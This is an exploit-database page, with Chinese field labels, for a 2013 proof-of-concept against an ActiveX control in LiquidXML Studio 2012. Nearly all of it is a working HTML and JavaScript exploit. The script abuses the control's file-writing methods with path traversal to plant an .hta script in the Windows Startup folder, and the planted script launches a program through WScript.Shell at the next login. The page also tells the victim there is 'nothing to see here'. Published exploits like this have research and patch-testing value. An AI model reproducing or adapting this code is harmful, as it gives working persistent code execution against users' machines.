LiquidXML Studio 2012 – ActiveX Insecure Method Executable File Creation

  • 作者: Dr_IDE
    日期: 2013-03-25
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/24884/
  • <html>
<object classid='clsid:8AEEAB4A-E1DA-4354-B800-8F0B553770E1' id='target'/></object>
<script>
var sofa = "..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\the_doctor_is_in.hta";
var king = "Oh noz, Look what Dr_IDE did...<" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
target.OpenFile(sofa,1);
target.AppendString(king);
</script>
<body>
LiquidXML Studio 2012 ActiveX Insecure Method Executable File Creation 0-day<br>
By: Dr_IDE<br>
GUID: {8AEEAB4A-E1DA-4354-B800-8F0B553770E1}<br>
Number of Interfaces: 1<br>
Default Interface: _FtpLibrary<br>
RegKey Safe for Script: False<br>
RegkeySafe for Init: False<br>
KillBitSet: False<br>
<br>
<br>
<br>
Nothing to see here, you can close the browser now...
</body>
</html>